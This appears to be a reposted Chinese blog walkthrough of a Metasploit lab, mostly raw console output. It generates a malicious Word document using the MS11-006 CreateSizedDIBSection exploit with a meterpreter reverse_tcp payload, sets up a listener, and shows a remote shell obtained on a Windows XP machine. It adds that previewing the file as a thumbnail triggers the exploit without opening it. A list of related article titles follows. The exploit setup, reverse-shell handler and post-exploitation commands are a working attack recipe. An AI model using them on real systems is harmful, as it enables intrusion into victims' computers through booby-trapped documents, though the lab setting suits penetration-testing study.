metasploit文件格式漏洞渗透攻击(成功获得shell)
来源:互联网 发布:情绪管理网络课程答案 编辑:程序博客网 时间:2024/04/29 22:51
环境BT5R1
msf > use windows/fileformat/ms11_006_createsizeddibsectionmsf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11LHOST => 192.168.1.11msf exploit(ms11_006_createsizeddibsection) > set LPORT 443LPORT => 443msf exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/OUTPUTPATH => /opt/framework/msf3/data/exploits/msf exploit(ms11_006_createsizeddibsection) > show optionsModule options (exploit/windows/fileformat/ms11_006_createsizeddibsection): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.doc yes The file name. OUTPUTPATH /opt/framework/msf3/data/exploits/ yes The output path to use.Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh yes Exit technique: seh, thread, process, none LHOST 192.168.1.11 yes The listen address LPORT 443 yes The listen portExploit target: Id Name -- ---- 0 Automaticmsf exploit(ms11_006_createsizeddibsection) > exploit[*] Creating 'msf.doc' file ...[*] Generated output file /opt/framework/msf3/data/exploits/msf.docmsf exploit(ms11_006_createsizeddibsection) > use multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.1.11LHOST => 192.168.1.11msf exploit(handler) > set LPORT 443LPORT => 443msf exploit(handler) > exploit -j[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.11:443 [*] Starting the payload handler...msf exploit(handler) > sessions -lActive sessions===============No active sessions.msf exploit(handler) >
把msf.doc复制到XP里,一开始,双击,BT5没反应。
后来,我用缩略图来查看,不需要双击msf.doc,BT5就有反应了(书中说是要打开该文档,估计有误)。
msf exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.143[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.143:1099) at 2013-05-14 19:32:47 -0400msf exploit(handler) > sessions -lActive sessions=============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 ROOT-4556186478\Administrator @ ROOT-4556186478 192.168.1.11:443 -> 192.168.1.143:1099msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...meterpreter > lsListing: C:\Documents and Settings\Administrator================================================Mode Size Type Last modified Name---- ---- ---- ------------- ----40777/rwxrwxrwx 0 dir 2013-05-14 10:20:44 -0400 .40777/rwxrwxrwx 0 dir 2013-05-14 10:20:43 -0400 ..40555/r-xr-xr-x 0 dir 2013-05-14 10:21:13 -0400 Application Data40777/rwxrwxrwx 0 dir 2013-05-14 10:14:40 -0400 Cookies40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 Desktop40555/r-xr-xr-x 0 dir 2013-05-14 10:21:21 -0400 Favorites40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 Local Settings40555/r-xr-xr-x 0 dir 2013-05-14 10:21:22 -0400 My Documents100666/rw-rw-rw- 786432 fil 2013-05-14 11:30:17 -0400 NTUSER.DAT40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 NetHood40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 PrintHood40555/r-xr-xr-x 0 dir 2013-05-14 11:30:35 -0400 Recent40555/r-xr-xr-x 0 dir 2013-05-14 10:21:02 -0400 SendTo40555/r-xr-xr-x 0 dir 2013-05-14 17:51:30 -0400 Start Menu40777/rwxrwxrwx 0 dir 2013-05-14 10:10:10 -0400 Templates100666/rw-rw-rw- 1024 fil 2013-05-14 11:32:49 -0400 ntuser.dat.LOG100666/rw-rw-rw- 178 fil 2013-05-14 10:23:33 -0400 ntuser.inimeterpreter > sysinfoComputer : ROOT-4556186478OS : Windows XP (Build 2600, Service Pack 3).Architecture : x86System Language : en_USMeterpreter : x86/win32meterpreter > shellProcess 1888 created.Channel 1 created.Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\Documents and Settings\Administrator>
如果换到简体中文版本的XP上面,用缩略图查看,则会失败,无法获得shell。
- metasploit文件格式漏洞渗透攻击(成功获得shell)
- metasploit文件格式漏洞渗透攻击(成功生成doc)
- metasploit文件格式漏洞渗透攻击(失败)
- 利用metasploit通过ms_08_067_netapi漏洞渗透winXp
- metasploit 攻击成功的实例
- Metasploit渗透Ubuntu 12.04攻击测试演练
- 使用metasploit进行渗透攻击步骤
- 渗透测试漏洞利用之漏洞攻击
- Set+Metasploit+Ettercap渗透欺骗拿Shell
- metasploit 渗透测试(ftp)
- metasploit针对性钓鱼攻击向量入侵成功
- metasploit对IE浏览器的极光漏洞进行渗透利用
- Metasploit 对 IE 浏览器的极光漏洞进行渗透利用
- Metasploit渗透
- 《Metasploit 魔鬼训练营》05 网络服务渗透攻击
- 《Metasploit 魔鬼训练营》06 客户端渗透攻击
- metasploit 初识|第一次模拟渗透成功之喜悦
- metasploit渗透测试(一)在 Mac 安装 Metasploit-framework
- IOS学习:基本控件(UIScrollView)
- ubuntu12.04安装或升级firefox至最新版(firefox20.0)
- java JVM 参数实例详解
- 多接口实现类中重名二义性冲突的处理
- 设计模式大集锦 程序员面试全攻略
- metasploit文件格式漏洞渗透攻击(成功获得shell)
- Linux 内核剖析
- linux下scp命令详解
- 防止内存泄露 Linux下用Valgrind做检查
- GenericServlet抽象类实现了Servlet接口
- 关于StringBuffer和String
- python数组的使用
- The Age Of Big Data Coming
- 【Android 设计】:模式_ Android新特性